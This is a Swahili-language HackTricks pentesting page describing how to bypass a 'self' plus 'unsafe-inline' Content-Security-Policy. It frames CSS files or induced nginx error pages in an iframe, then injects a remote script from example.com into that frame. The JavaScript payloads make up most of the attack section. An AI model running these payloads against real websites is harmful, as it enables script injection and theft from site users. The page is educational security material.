hacktricks/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
2024-02-11 02:13:58 +00:00

80 lines
4.7 KiB
Markdown

<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
A configuration such as:
```
Content-Security-Policy: default-src 'self' 'unsafe-inline';
```
Inazuia matumizi ya kazi yoyote inayotekeleza nambari iliyotumwa kama herufi. Kwa mfano: `eval, setTimeout, setInterval` zote zitazuiliwa kwa sababu ya mipangilio ya `unsafe-eval`.
Yaliyomo kutoka vyanzo vya nje pia yatazuiliwa, ikiwa ni pamoja na picha, CSS, WebSockets, na, hasa, JS.
### Kupitia Nakala na Picha
Imeonekana kuwa vivinjari vya kisasa hubadilisha picha na maandishi kuwa HTML ili kuboresha kuonyesha kwao (kwa mfano, kuweka milango, kati, nk.). Kwa hivyo, ikiwa picha au faili ya maandishi, kama vile `favicon.ico` au `robots.txt`, inafunguliwa kupitia `iframe`, inaonyeshwa kama HTML. Kwa umuhimu, kurasa hizi mara nyingi hazina vichwa vya CSP na huenda hazijumuishi X-Frame-Options, kuruhusu utekelezaji wa JavaScript wa kiholela kutoka kwao:
```javascript
frame=document.createElement("iframe");
frame.src="/css/bootstrap.min.css";
document.body.appendChild(frame);
script=document.createElement('script');
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);
```
### Kupitia Makosa
Vivyo hivyo, majibu ya makosa, kama vile faili za maandishi au picha, kawaida huja bila vichwa vya CSP na yanaweza kukosa X-Frame-Options. Makosa yanaweza kusababisha kupakia ndani ya kisanduku cha iframe, kuruhusu hatua zifuatazo:
```javascript
// Inducing an nginx error
frame=document.createElement("iframe");
frame.src="/%2e%2e%2f";
document.body.appendChild(frame);
// Triggering an error with a long URL
frame=document.createElement("iframe");
frame.src="/"+"A".repeat(20000);
document.body.appendChild(frame);
// Generating an error via extensive cookies
for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};
frame=document.createElement("iframe");
frame.src="/";
document.body.appendChild(frame);
// Removal of cookies is crucial post-execution
for(var i=0;i<5;i++){document.cookie=i+"="}
```
Baada ya kuzindua mojawapo ya hali zilizotajwa, utekelezaji wa JavaScript ndani ya kioo cha mtandao unaweza kufanikiwa kama ifuatavyo:
```javascript
script=document.createElement('script');
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);
```
## Marejeo
* [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>